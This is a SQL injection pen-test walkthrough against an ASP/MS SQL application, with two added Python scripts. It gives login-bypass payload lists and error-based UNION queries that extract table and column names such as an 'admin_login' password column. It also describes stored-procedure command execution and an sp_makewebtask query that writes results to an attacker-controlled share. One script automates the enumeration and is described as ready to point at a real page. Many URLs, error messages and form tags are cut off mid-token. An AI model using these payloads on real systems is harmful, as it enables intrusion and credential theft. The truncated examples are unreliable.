SQL Injection Walkthrough

Introduction

When a machine has nothing but port 80 open, the web application is what remains to attack. SQL injection is a type of web hacking that requires nothing but port 80: it attacks the web application itself (ASP, JSP, PHP, CGI, and so on) rather than the web server or the services running on the OS. This article does not introduce anything new; SQL injection has been widely written about and used in the wild. We wrote it because we wanted to document some of our pen-tests using SQL injection, in the hope that it may be of some use to others. You may find a trick or two, but please check "9. Where can I get more info?" for the people who truly deserve the credit for developing many of the techniques in SQL injection.

What is SQL Injection?

It is a trick to inject SQL queries or commands through input, typically via web pages. Many web pages take parameters from the user and build a SQL query to the database from them. Take a login page, for instance: it takes the user name and password and issues a SQL query to the database to check whether that user has a valid name and password. With SQL injection it is possible to send a crafted user name and/or password that changes the SQL query and thus grants us something else.

What do you need?

Any web browser.

What should you look for?

Try to look for pages that allow you to submit data, such as login or search pages. Sometimes HTML pages use the POST method to send parameters to another ASP page, so you may not see the parameters in the URL.
However, you can check the HTML source and look for the FORM tag. You may find something like this:

<FORM action=Search/search. A value=C></FORM>

Everything between <FORM> and </FORM> is a potential parameter that might be useful (exploit wise).

What if you can't find any page that takes input?

Look for ASP, JSP, CGI, or PHP pages, and especially for URLs that take parameters, like: http://duck/index.

How do you test if it is vulnerable?

Start with the single quote trick. Input something like

hi' or 1=1--

into the login field, the password field, or even the URL. Example:

Login: hi' or 1=1--
Pass: hi' or 1=1--
http://duck/index.

If you must do this through a hidden field, download the page's HTML, save it to disk, and modify the URL and the hidden field accordingly. Example:

<FORM action=http://duck/Search/search. A value="hi' or 1=1--"></FORM>

If luck is on your side, you will be logged in without any login name or password.

But why ' or 1=1--?

Let us look at another example of why ' or 1=1-- is important. Other than bypassing login, it can also expose information that is not normally available. Take an ASP page that links to another page with the following URL: http://duck/index. In the URL, 'category' is the variable name and 'food' is the value assigned to it. To serve that request, the ASP might contain the following code (this is the actual code we created for this exercise):

v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.
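The ASP lines above, rebuilt as an added Python example (this is not code from the original article; SQLite stands in for MS SQL Server and the product rows are constructed). It shows the single-quote probe, the normal 'food' request, the "food' or 1=1--" and "' or 'a'='a" bypasses against the concatenated query, and a parameterized version of the same query that the payloads cannot alter:

```python
import sqlite3

# Constructed sample rows for the article's 'product' table (not data from the original page).
PRODUCTS = [
    (1, "apple", "food"),
    (2, "bread", "food"),
    (3, "hammer", "tools"),
    (4, "shampoo", "cosmetics"),
]


def make_db():
    """In-memory SQLite database holding the constructed product table; SQLite stands in for MS SQL."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER, name TEXT, PCategory TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?, ?)", PRODUCTS)
    return conn


def build_sqlstr(v_cat):
    """Same string the ASP line  sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"  builds."""
    return "SELECT * FROM product WHERE PCategory='" + v_cat + "'"


def vulnerable_lookup(conn, v_cat):
    """Port of the vulnerable ASP: the request parameter is concatenated straight into the SQL text."""
    return conn.execute(build_sqlstr(v_cat)).fetchall()


def safe_lookup(conn, v_cat):
    """Hardened version: the value is bound as a parameter, so quotes and comments in it stay data."""
    return conn.execute("SELECT * FROM product WHERE PCategory=?", (v_cat,)).fetchall()


def probe(conn, v_cat):
    """The single-quote test from the article: returns the database error text, or None if no error."""
    try:
        vulnerable_lookup(conn, v_cat)
        return None
    except sqlite3.Error as exc:
        return str(exc)


if __name__ == "__main__":
    db = make_db()
    for v_cat in ["food", "hi'", "food' or 1=1--", "food' or 'a'='a"]:
        print("category=%r -> %s" % (v_cat, build_sqlstr(v_cat)))
        err = probe(db, v_cat)
        if err:
            print("  vulnerable query: error: %s" % err)
        else:
            print("  vulnerable query: %d row(s)" % len(vulnerable_lookup(db, v_cat)))
        print("  parameterized query: %d row(s)" % len(safe_lookup(db, v_cat)))
```

A lone quote breaks the concatenated query (that error is the signal the single-quote trick looks for), "food' or 1=1--" returns every row instead of the two food rows, and the parameterized query returns nothing for either payload because the whole string is compared as a category name.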
As we can see, our input is placed into v_cat, and the SQL statement becomes:

SELECT * FROM product WHERE PCategory='food'

The query should return a result set containing the rows that match the WHERE condition, in this case 'food'. Now assume we change the URL into something like this: http://duck/index. Our variable v_cat now equals "food' or 1=1--". Substituting this into the SQL query gives:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

The query now selects everything from the product table, regardless of whether PCategory equals 'food'. The double dash "--" tells MS SQL Server to ignore the rest of the query, which gets rid of the hanging single quote ('). Sometimes it may be possible to replace the double dash with a single hash "#". However, if it is not SQL Server, or you simply cannot ignore the rest of the query, you may also try

' or 'a'='a

The SQL query then becomes:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

It should return the same result. Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

How do I get remote execution with SQL injection?

Being able to inject SQL commands usually means we can execute any SQL query at will. A default installation of MS SQL Server of the era described here runs as SYSTEM, which is equivalent to Administrator access on Windows (later versions install under a low-privilege service account by default, so do not assume this everywhere), and we can use stored procedures in the master database to run commands. Try a double quote (") if the single quote (') does not work. The semicolon ends the current SQL query and thus lets us start a new SQL command. To verify that the command executed successfully, listen for the ICMP echo requests the server sends when it is told to ping your host. If you do not get any ping request from the server and instead get an error message indicating a permission problem, the administrator may have restricted the web user's access to these stored procedures.

How to get output of my SQL query?
It is possible to use sp_makewebtask to write the result of your query into an HTML file:

'; EXEC master..sp_makewebtask <output file on your share>, "SELECT * FROM INFORMATION_SCHEMA.TABLES"

The output file must live on a host you control in a folder "share" that is shared for Everyone, so that the SQL Server service can write to it.

How to get data from the database using ODBC error messages

We can use the information in the error messages produced by MS SQL Server to get almost any data we want. Take the following page for example: http://duck/index. We will try to UNION the page's integer parameter with a string value selected from the database:

http://duck/index. UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

The system table INFORMATION_SCHEMA.TABLES contains information about all tables on the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

This should return the first table name in the database. When we UNION this string value with an integer, MS SQL Server tries to convert the string (nvarchar) to an integer. This fails, since nvarchar cannot be converted to int, and the server displays the following error:

Microsoft OLE DB Provider for ODBC Drivers error '8.
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table.

The error message is nice enough to tell us the value that could not be converted into an integer. In this case, we have obtained the first table name in the database, "table.

To get the next table name, we can use the following query:

http://duck/index. UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table.

We can also search for data using the LIKE keyword:

http://duck/index. UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%2.

Output:

Microsoft OLE DB Provider for ODBC Drivers error '8.
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.

The matching pattern, '%2. is URL-encoded in the request (a literal % has to be sent as %25 or the web server eats it) and is seen by SQL Server as an ordinary LIKE pattern.
In this case, we get the first table name that matches the criteria, "admin_login".

How to mine all column names of a table?

We can use another useful table, INFORMATION_SCHEMA.COLUMNS, to map out all the column names of a table:

http://duck/index. UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '8.
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.

Now that we have the first column name, we can use NOT IN () to get the next one (the second condition is joined with AND, not a second WHERE):

http://duck/index. UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '8.
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.

Continuing in the same way, we obtain the rest of the column names, i.e. 'password' and 'details'. We know we have them all when we get the following error message instead of a converted value:

http://duck/index. UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id','login_name','password','details')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '8.
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
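The NOT IN walk used above for table names and again for column names, automated as an added Python example (not code from the original article). The target is a constructed stand-in: SQLite holds a small model of INFORMATION_SCHEMA.TABLES and INFORMATION_SCHEMA.COLUMNS, and the fake_target() function reproduces the ODBC conversion error when the injected SELECT returns a string where the page expects an integer; the table and column names in SCHEMA are constructed, and the error number is left out. The enumerator only depends on the response text, so an HTTP request against a real page can be swapped in for fake_target():

```python
import re
import sqlite3

# Constructed stand-in for the remote database's INFORMATION_SCHEMA views (not data from the original page).
SCHEMA = {
    "product": ["PCategory"],
    "admin_login": ["login_id", "login_name", "password", "details"],
}

# The conversion error text the article relies on (error number omitted).
CONVERT_ERR = ("Microsoft OLE DB Provider for ODBC Drivers error\n"
               "[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting "
               "the nvarchar value '{}' to a column of data type int.")

# Pulls the leaked value out of the error message.
ERR_RE = re.compile(r"converting the nvarchar value '([^']*)' to a column of data type int")


def make_fake_target():
    """SQLite model of INFORMATION_SCHEMA.TABLES / COLUMNS built from the constructed SCHEMA."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE information_schema_tables (TABLE_NAME TEXT)")
    conn.execute("CREATE TABLE information_schema_columns (TABLE_NAME TEXT, COLUMN_NAME TEXT)")
    for table, cols in SCHEMA.items():
        conn.execute("INSERT INTO information_schema_tables VALUES (?)", (table,))
        conn.executemany("INSERT INTO information_schema_columns VALUES (?, ?)",
                         [(table, c) for c in cols])
    return conn


FAKE_DB = make_fake_target()


def fake_target(payload):
    """Plays the vulnerable page: the injected text is appended to a SELECT of an int column.
    Runs the attacker's SELECT against the SQLite model (TOP 1 becomes LIMIT 1) and, when a
    string comes back where MS SQL would expect an int, returns the conversion error page;
    otherwise returns a normal page."""
    inner = payload[len("UNION "):].rstrip("-")      # drop the leading UNION and the trailing --
    inner = (inner.replace("TOP 1 ", "")
                  .replace("INFORMATION_SCHEMA.TABLES", "information_schema_tables")
                  .replace("INFORMATION_SCHEMA.COLUMNS", "information_schema_columns")
             + " LIMIT 1")
    row = FAKE_DB.execute(inner).fetchone()
    if row is None:
        return "<html>normal page, nothing leaked</html>"
    return CONVERT_ERR.format(row[0])


def enumerate_names(oracle, column, table, where=""):
    """Walks the article's NOT IN (...) chain until the response no longer leaks a new name."""
    found = []
    while True:
        conds = [where] if where else []
        if found:
            conds.append("%s NOT IN (%s)" % (column, ",".join("'%s'" % n for n in found)))
        payload = "UNION SELECT TOP 1 %s FROM %s" % (column, table)
        if conds:
            payload += " WHERE " + " AND ".join(conds)
        payload += "--"
        match = ERR_RE.search(oracle(payload))
        if not match:
            return found
        found.append(match.group(1))


def dump_schema(oracle):
    """Table names first, then the columns of each table, exactly as the article does by hand."""
    return {t: enumerate_names(oracle, "COLUMN_NAME", "INFORMATION_SCHEMA.COLUMNS",
                               "TABLE_NAME='%s'" % t)
            for t in enumerate_names(oracle, "TABLE_NAME", "INFORMATION_SCHEMA.TABLES")}


if __name__ == "__main__":
    for table, cols in dump_schema(fake_target).items():
        print("%s: %s" % (table, ", ".join(cols)))
```

The loop stops on any response that does not carry the conversion error; on the real target in the article the end of the list showed up as the different "ORDER BY items must appear in the select list" error, which this check also treats as "no more names". The NOT IN list grows by one name per request, so a table with many columns costs as many requests as it has columns.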